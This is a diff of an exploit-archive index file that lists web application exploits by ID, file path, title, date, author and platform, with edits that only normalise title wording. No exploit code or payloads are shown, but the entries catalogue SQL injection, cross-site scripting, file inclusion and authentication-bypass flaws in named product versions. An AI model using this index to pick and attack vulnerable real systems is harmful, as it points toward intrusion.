7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - Database Disclosure",2008-12-16,"Cold Zero",asp,webapps,0
7489,platforms/php/webapps/7489.pl,"FLDS 1.2a - 'report.php' SQL Injection",2008-12-16,ka0x,php,webapps,0
@ -22029,7 +22032,7 @@ id,file,description,date,author,platform,type,port
9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - 'uid' SQL Injection",2009-07-10,Monster-Dz,php,webapps,0
9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - 'login.php user' Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0
9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection / Remote Code Execution",2009-07-10,darkjoker,php,webapps,0
9110,platforms/php/webapps/9110.txt,"WordPress Core & MU & Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0
9110,platforms/php/webapps/9110.txt,"WordPress Core / MU / Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0
9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps,0
9112,platforms/php/webapps/9112.txt,"Joomla! Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0
9115,platforms/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure",2009-07-10,darkjoker,php,webapps,0
@ -22648,7 +22651,7 @@ id,file,description,date,author,platform,type,port
10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0
10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - Authentication Bypass",2009-12-16,R3d-D3V!L,php,webapps,0
10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player_id' Parameter SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0
10502,platforms/asp/webapps/10502.txt,"Pre Hotels&Resorts Management System - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0
10503,platforms/asp/webapps/10503.txt,"ASPGuest - 'edit.asp ID' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
10504,platforms/asp/webapps/10504.txt,"Smart ASPad - 'campaignEdit.asp CCam' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
10505,platforms/asp/webapps/10505.txt,"Multi-Lingual Application - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0
@ -23290,7 +23293,7 @@ id,file,description,date,author,platform,type,port
11623,platforms/php/webapps/11623.txt,"smartplugs 1.3 - SQL Injection showplugs.php",2010-03-03,"Easy Laster",php,webapps,0
11624,platforms/php/webapps/11624.pl,"MiNBank 1.5.0 - Remote Command Execution",2010-03-03,JosS,php,webapps,0
11625,platforms/php/webapps/11625.txt,"Joomla! Component com_blog - Directory Traversal",2010-03-03,"DevilZ TM",php,webapps,0
11627,platforms/php/webapps/11627.txt,"PHP-Nuke CMS - (Survey and Poll) SQL Injection",2010-03-04,SENOT,php,webapps,0
11627,platforms/php/webapps/11627.txt,"PHP-Nuke CMS (Survey and Poll) - SQL Injection",2010-03-04,SENOT,php,webapps,0
11631,platforms/php/webapps/11631.txt,"PHP-Nuke - user.php SQL Injection",2010-03-04,"Easy Laster",php,webapps,0
11634,platforms/hardware/webapps/11634.pl,"Sagem Routers - Remote Authentication Bypass",2010-03-04,AlpHaNiX,hardware,webapps,0
11635,platforms/php/webapps/11635.pl,"OneCMS 2.5 - SQL Injection",2010-03-05,"Ctacok and .:[melkiy]:",php,webapps,0
@ -23686,7 +23689,7 @@ id,file,description,date,author,platform,type,port
12257,platforms/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,php,webapps,0
12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - Authentication Bypass",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0
12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0
12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change Username and Password)",2010-04-16,EL-KAHINA,php,webapps,0
12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
12269,platforms/php/webapps/12269.txt,"Joomla! Component JoltCard 1.2.1 - SQL Injection",2010-04-16,Valentin,php,webapps,0
@ -23797,7 +23800,7 @@ id,file,description,date,author,platform,type,port
12444,platforms/php/webapps/12444.txt,"PHP Video Battle - SQL Injection",2010-04-28,v3n0m,php,webapps,0
12445,platforms/php/webapps/12445.txt,"Articles Directory - Authentication Bypass",2010-04-29,Sid3^effects,php,webapps,0
12446,platforms/php/webapps/12446.txt,"TR Forum 1.5 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps,0
12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 - Pass / Creat and Download Backup",2010-04-29,indoushka,php,webapps,0
12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 - Pass / Create and Download Backup",2010-04-29,indoushka,php,webapps,0
12448,platforms/php/webapps/12448.txt,"Socialware 2.2 - Upload / Cross-Site Scripting",2010-04-29,Sid3^effects,php,webapps,0
12449,platforms/php/webapps/12449.txt,"DZCP (deV!L_z Clanportal) 1.5.3 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps,0
12450,platforms/windows/webapps/12450.txt,"Microsoft SharePoint Server 2007 - Cross-Site Scripting",2010-04-29,"High-Tech Bridge SA",windows,webapps,0
@ -24280,7 +24283,7 @@ id,file,description,date,author,platform,type,port
14035,platforms/php/webapps/14035.txt,"Big Forum - 'forum.php?id' SQL Injection",2010-06-24,JaMbA,php,webapps,0
14047,platforms/php/webapps/14047.txt,"2DayBiz Matrimonial Script - SQL Injection / Cross-Site Scripting",2010-06-25,Sangteamtham,php,webapps,0
14048,platforms/php/webapps/14048.txt,"2DayBiz - Multiple SQL Injections",2010-06-25,Sangteamtham,php,webapps,0
14049,platforms/php/webapps/14049.html,"Allomani Songs & Clips Script 2.7.0 - Cross-Site Request Forgery (Add Admin)",2010-06-25,G0D-F4Th3rG0D-F4Th3r,php,webapps,0
14049,platforms/php/webapps/14049.html,"Allomani Songs & Clips 2.7.0 - Cross-Site Request Forgery (Add Admin)",2010-06-25,G0D-F4Th3rG0D-F4Th3r,php,webapps,0
14050,platforms/php/webapps/14050.txt,"ARSC Really Simple Chat 3.3 - Remote File Inclusion / Cross-Site Scripting",2010-06-25,"Zer0 Thunder",php,webapps,0
14051,platforms/php/webapps/14051.txt,"2DayBiz B2B Portal Script - 'selling_buy_leads1.php' SQL Injection",2010-06-25,r45c4l,php,webapps,0
14053,platforms/php/webapps/14053.txt,"snipe Gallery Script - SQL Injection",2010-06-25,"dev!l ghost",php,webapps,0
@ -26596,7 +26599,7 @@ id,file,description,date,author,platform,type,port
21588,platforms/cgi/webapps/21588.txt,"BlackBoard 5.0 - Cross-Site Scripting",2002-07-01,"Berend-Jan Wever",cgi,webapps,0
21590,platforms/php/webapps/21590.txt,"phpAuction 1/2 - Unauthorized Administrative Access",2002-07-02,ethx,php,webapps,0
21609,platforms/cgi/webapps/21609.txt,"Fluid Dynamics Search Engine 2.0 - Cross-Site Scripting",2002-07-10,VALDEUX,cgi,webapps,0
21610,platforms/php/webapps/21610.txt,"Sun i-Runbook 2.5.2 - Directory And File Content Disclosure",2002-07-11,JWC,php,webapps,0
21610,platforms/php/webapps/21610.txt,"Sun i-Runbook 2.5.2 - Directory and File Content Disclosure",2002-07-11,JWC,php,webapps,0
21617,platforms/cgi/webapps/21617.txt,"IMHO Webmail 0.9x - Account Hijacking",2002-07-15,"Security Bugware",cgi,webapps,0
21621,platforms/jsp/webapps/21621.txt,"Macromedia Sitespring 1.2 - Default Error Page Cross-Site Scripting",2002-07-17,"Peter Gründl",jsp,webapps,0
21622,platforms/php/webapps/21622.txt,"PHP-Wiki 1.2/1.3 - Cross-Site Scripting",2002-07-17,Pistone,php,webapps,0
@ -27827,10 +27830,10 @@ id,file,description,date,author,platform,type,port
24667,platforms/php/webapps/24667.txt,"WordPress 1.2 - 'wp-login.php' HTTP Response Splitting",2004-10-07,"Chaotic Evil",php,webapps,0
24670,platforms/asp/webapps/24670.txt,"Go Smart Inc GoSmart Message Board - Multiple Input Validation Vulnerabilities",2004-10-11,"Positive Technologies",asp,webapps,0
24671,platforms/asp/webapps/24671.txt,"DUclassified 4.x - 'adDetail.asp' Multiple Parameter SQL Injections",2004-10-11,"Soroosh Dalili",asp,webapps,0
24672,platforms/asp/webapps/24672.txt,"DUclassmate 1.x - account.asp MM-recordId Parameter Arbitrary Password Modification",2004-10-11,"Soroosh Dalili",asp,webapps,0
24672,platforms/asp/webapps/24672.txt,"DUclassmate 1.x - 'account.asp MM-recordId' Arbitrary Password Modification",2004-10-11,"Soroosh Dalili",asp,webapps,0
24673,platforms/asp/webapps/24673.txt,"DUforum 3.x - Login Form Password Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
24674,platforms/asp/webapps/24674.txt,"DUforum 3.x - messages.asp FOR_ID Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
24675,platforms/asp/webapps/24675.txt,"DUforum 3.x - messageDetail.asp MSG_ID Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
24674,platforms/asp/webapps/24674.txt,"DUforum 3.x - 'messages.asp FOR_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
24675,platforms/asp/webapps/24675.txt,"DUforum 3.x - 'messageDetail.asp MSG_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
24676,platforms/php/webapps/24676.txt,"SCT Campus Pipeline 1.0/2.x/3.x - Render.UserLayoutRootNode.uP Cross-Site Scripting",2004-10-13,"Matthew Oyer",php,webapps,0
24680,platforms/cfm/webapps/24680.txt,"FuseTalk Forum 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-10-13,steven,cfm,webapps,0
24683,platforms/php/webapps/24683.txt,"Pinnacle Systems ShowCenter 1.51 - SettingsBase.php Cross-Site Scripting",2004-10-14,"Secunia Research",php,webapps,0
@ -32116,7 +32119,7 @@ id,file,description,date,author,platform,type,port
30855,platforms/asp/webapps/30855.txt,"WebDoc 3.0 - Multiple SQL Injections",2007-12-07,Chrysalid,asp,webapps,0
30857,platforms/php/webapps/30857.txt,"webSPELL 4.1.2 - usergallery.php galleryID Parameter Cross-Site Scripting",2007-12-10,Brainhead,php,webapps,0
30858,platforms/php/webapps/30858.txt,"webSPELL 4.1.2 - calendar.php Multiple Parameter Cross-Site Scripting",2007-12-10,Brainhead,php,webapps,0
30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation And Input Validation",2007-12-10,"Tomas Kuliavas",php,webapps,0
30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation / Input Validation",2007-12-10,"Tomas Kuliavas",php,webapps,0
30860,platforms/asp/webapps/30860.txt,"bttlxe Forum 2.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2007-12-10,Mormoroth,asp,webapps,0
30861,platforms/php/webapps/30861.txt,"E-Xoops 1.0.5/1.0.8 - mylinks/ratelink.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 - adresses/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
@ -32560,7 +32563,7 @@ id,file,description,date,author,platform,type,port
31546,platforms/asp/webapps/31546.txt,"DigiDomain 2.2 - lookup_result.asp domain Parameter Cross-Site Scripting",2008-03-27,Linux_Drox,asp,webapps,0
31547,platforms/asp/webapps/31547.txt,"DigiDomain 2.2 - suggest_result.asp Multiple Parameter Cross-Site Scripting",2008-03-27,Linux_Drox,asp,webapps,0
31985,platforms/hardware/webapps/31985.txt,"MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation",2014-02-28,"SEC Consult",hardware,webapps,0
31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' and 'main_dir' Parameters Multiple Remote File Inclusion",2008-03-27,XxX,php,webapps,0
31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' / 'main_dir' Multiple Remote File Inclusion",2008-03-27,XxX,php,webapps,0
31555,platforms/php/webapps/31555.txt,"Simple Machines Forum (SMF) 1.1.4 - Multiple Remote File Inclusion",2008-03-28,Sibertrwolf,php,webapps,0
40770,platforms/php/webapps/40770.txt,"CS-Cart 4.3.10 - XML External Entity Injection",2016-11-16,0x4148,php,webapps,0
40353,platforms/php/webapps/40353.py,"Zabbix 2.0 < 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0
@ -34025,7 +34028,7 @@ id,file,description,date,author,platform,type,port
34110,platforms/php/webapps/34110.txt,"PGAUTOPro - SQL Injection / Cross-Site Scripting (2)",2010-06-09,Sid3^effects,php,webapps,0
34111,platforms/multiple/webapps/34111.txt,"(GREEZLE) Global Real Estate Agent Login - Multiple SQL Injections",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0
34339,platforms/php/webapps/34339.txt,"Pligg CMS 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0
34124,platforms/php/webapps/34124.txt,"WordPress Plugin WP BackupPlus - Database And Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0
34124,platforms/php/webapps/34124.txt,"WordPress Plugin WP BackupPlus - Database and Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0
34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)",2014-07-21,"Brandon Perry",linux,webapps,80
34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,php,webapps,0
34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80
@ -34268,7 +34271,7 @@ id,file,description,date,author,platform,type,port
34536,platforms/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
34538,platforms/php/webapps/34538.txt,"WordPress Plugin Premium Gallery Manager - Unauthenticated Configuration Access",2014-09-05,Hannaichi,php,webapps,80
34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Persistent Cross-Site Scripting",2014-09-05,"Fikri Fadzil",php,webapps,80
34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus - Name and Body Fields HTML Injection Vulnerabilities",2010-08-29,MiND,php,webapps,0
34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,php,webapps,0
34543,platforms/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 - Parameters.php device Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0
34544,platforms/php/webapps/34544.txt,"HP Insight Diagnostics Online Edition 8.4 - idstatusframe.php Multiple Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0
34545,platforms/php/webapps/34545.txt,"HP Insight Diagnostics Online Edition 8.4 - survey.php category Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0
@ -34727,7 +34730,7 @@ id,file,description,date,author,platform,type,port
35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System (AWBS) 2.9.2 - 'oid' Parameter SQL Injection",2011-01-16,ShivX,php,webapps,0
35233,platforms/multiple/webapps/35233.txt,"B-Cumulus - 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0
35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
35238,platforms/multiple/webapps/35238.txt,"Gogs - (users and repos q pararm) SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,0
35238,platforms/multiple/webapps/35238.txt,"Gogs - users and repos q SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,0
35239,platforms/php/webapps/35239.txt,"phpCMS 2008 V2 - 'data.php' SQL Injection",2011-01-17,R3d-D3V!L,php,webapps,0
35245,platforms/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",2011-01-19,"BorN To K!LL",php,webapps,0
35246,platforms/php/webapps/35246.py,"Joomla! Component 'com_hdflvplayer' < 2.1.0.1 - Arbitrary File Download",2014-11-15,"Claudio Viviani",php,webapps,0
@ -35089,7 +35092,7 @@ id,file,description,date,author,platform,type,port
35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80
35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0
35846,platforms/php/webapps/35846.txt,"WordPress Plugin Pixarbay Images 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80
35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 - 'user' and 'pass' SQL Injection",2011-06-13,pentesters.ir,php,webapps,0
35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection",2011-06-13,pentesters.ir,php,webapps,0
35852,platforms/asp/webapps/35852.txt,"Microsoft Lync Server 2010 - 'ReachJoin.aspx' Remote Command Injection",2011-06-13,"Mark Lachniet",asp,webapps,0
35853,platforms/php/webapps/35853.php,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (1)",2011-06-13,pentesters.ir,php,webapps,0
35854,platforms/php/webapps/35854.pl,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (2)",2011-06-13,pentesters.ir,php,webapps,0
@ -35332,7 +35335,7 @@ id,file,description,date,author,platform,type,port
36214,platforms/php/webapps/36214.txt,"BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,php,webapps,0
36215,platforms/php/webapps/36215.txt,"Joomla! Component com_expedition - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0
36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusion",2011-10-10,indoushka,php,webapps,0
36220,platforms/php/webapps/36220.txt,"Joomla! Component 'com_tree' - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
36220,platforms/php/webapps/36220.txt,"Joomla! Component com_tree - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
36221,platforms/php/webapps/36221.txt,"Joomla! Component com_br - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
36222,platforms/php/webapps/36222.txt,"Joomla! Component 'com_shop' - 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusion",2011-10-11,indoushka,php,webapps,0
@ -35799,7 +35802,7 @@ id,file,description,date,author,platform,type,port
36925,platforms/php/webapps/36925.py,"elFinder 2 - Remote Command Execution (via File Creation)",2015-05-06,"TUNISIAN CYBER",php,webapps,0
36926,platforms/php/webapps/36926.txt,"LeKommerce - 'id' Parameter SQL Injection",2012-03-08,Mazt0r,php,webapps,0
36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 - setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0
36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - listing.aspx searchText Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - '/help/helpredir.aspx guide' Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
@ -36085,7 +36088,7 @@ id,file,description,date,author,platform,type,port
37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 - admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0
37816,platforms/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",multiple,webapps,0
37815,platforms/php/webapps/37815.txt,"vBulletin < 4.2.2 - Memcache Remote Code Execution",2015-08-18,"Joshua Rogers",php,webapps,80
39249,platforms/php/webapps/39249.txt,"WeBid - Multiple Cross-Site Scripting And LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0
39249,platforms/php/webapps/39249.txt,"WeBid - Multiple Cross-Site Scripting / LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0
37440,platforms/php/webapps/37440.txt,"Watchguard XCS 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0
37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - Cross-Site Scripting",2015-06-24,hyp3rlinx,php,webapps,80
37361,platforms/php/webapps/37361.txt,"WordPress Plugin Huge-IT Slider 2.7.5 - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0
@ -36126,7 +36129,7 @@ id,file,description,date,author,platform,type,port
37413,platforms/php/webapps/37413.txt,"Joomla! Component JCal Pro Calendar - SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0
37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 - Multiple SQL Injections",2012-06-16,JosS,php,webapps,0
37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection / Local File Inclusion",2012-06-16,snup,php,webapps,0
37416,platforms/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0
37416,platforms/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting / XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0
37417,platforms/php/webapps/37417.php,"Multiple WordPress Themes - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0
37418,platforms/php/webapps/37418.php,"WordPress Plugin LB Mixed Slideshow - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0
37419,platforms/php/webapps/37419.txt,"WordPress Plugin Wp-ImageZoom - 'file' Parameter Remote File Disclosure",2012-06-18,"Sammy FORGIT",php,webapps,0
@ -36353,7 +36356,7 @@ id,file,description,date,author,platform,type,port
37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection",2015-08-13,"Dawid Golunski",multiple,webapps,0
37767,platforms/multiple/webapps/37767.txt,"Joomla! Component 'com_jem' 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",multiple,webapps,0
37769,platforms/php/webapps/37769.txt,"Gkplugins Picasaweb - Download File",2015-08-15,"TMT zno",php,webapps,0
37770,platforms/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor and Remote Code Execution (PoC)",2015-08-15,MadMouse,hardware,webapps,0
37770,platforms/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor / Remote Code Execution (PoC)",2015-08-15,MadMouse,hardware,webapps,0
37773,platforms/php/webapps/37773.txt,"Joomla! Component 'com_memorix' - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0
37774,platforms/php/webapps/37774.txt,"Joomla! Component 'com_informations' - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0
37778,platforms/hardware/webapps/37778.txt,"Security IP Camera Star Vision DVR - Authentication Bypass",2015-08-15,"Meisam Monsef",hardware,webapps,0
@ -36403,8 +36406,8 @@ id,file,description,date,author,platform,type,port
37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart - 'searchFor' Parameter Cross-Site Scripting",2011-12-30,farbodmahini,php,webapps,0
37885,platforms/php/webapps/37885.html,"up.time 7.5.0 - Superadmin Privilege Escalation",2015-08-19,LiquidWorm,php,webapps,9999
37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 - Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-19,LiquidWorm,php,webapps,9999
37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 - Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999
37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 - Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999
37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 - Arbitrary File Disclose and Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999
37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 - Upload and Execute Exploit",2015-08-19,LiquidWorm,php,webapps,9999
37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple Vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343
37892,platforms/asp/webapps/37892.txt,"Vifi Radio 1.0 - Cross-Site Request Forgery",2015-08-20,KnocKout,asp,webapps,80
37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80
@ -37231,7 +37234,7 @@ id,file,description,date,author,platform,type,port
39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443
39626,platforms/multiple/webapps/39626.txt,"Liferay Portal 5.1.2 - Persistent Cross-Site Scripting",2016-03-28,"Sarim Kiani",multiple,webapps,80
39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80
39573,platforms/windows/webapps/39573.txt,"Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0
39573,platforms/windows/webapps/39573.txt,"Wildfly - 'WEB-INF' / 'META-INF' Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0
39575,platforms/php/webapps/39575.txt,"WordPress Plugin eBook Download 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
39576,platforms/php/webapps/39576.txt,"WordPress Plugin Import CSV 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
39577,platforms/php/webapps/39577.txt,"WordPress Plugin Abtest - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80
@ -38306,7 +38309,7 @@ id,file,description,date,author,platform,type,port
42064,platforms/multiple/webapps/42064.html,"Apple WebKit / Safari 10.0.3(12602.4.8) - 'Editor::Command::execute' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42065,platforms/multiple/webapps/42065.html,"WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42066,platforms/multiple/webapps/42066.txt,"WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42067,platforms/multiple/webapps/42067.html,"WebKit - enqueuePageshowEvent and enqueuePopstateEvent Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42067,platforms/multiple/webapps/42067.html,"WebKit - 'enqueuePageshowEvent' / 'enqueuePopstateEvent' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42068,platforms/multiple/webapps/42068.html,"WebKit - 'FrameLoader::clear' Stealing Variables via Page Navigation",2017-05-25,"Google Security Research",multiple,webapps,0
42069,platforms/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42074,platforms/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,hardware,webapps,0
@ -38320,7 +38323,7 @@ id,file,description,date,author,platform,type,port
42101,platforms/linux/webapps/42101.py,"Riverbed SteelHead VCX 9.6.0a - Arbitrary File Read",2017-06-01,"Gregory Draperi",linux,webapps,0
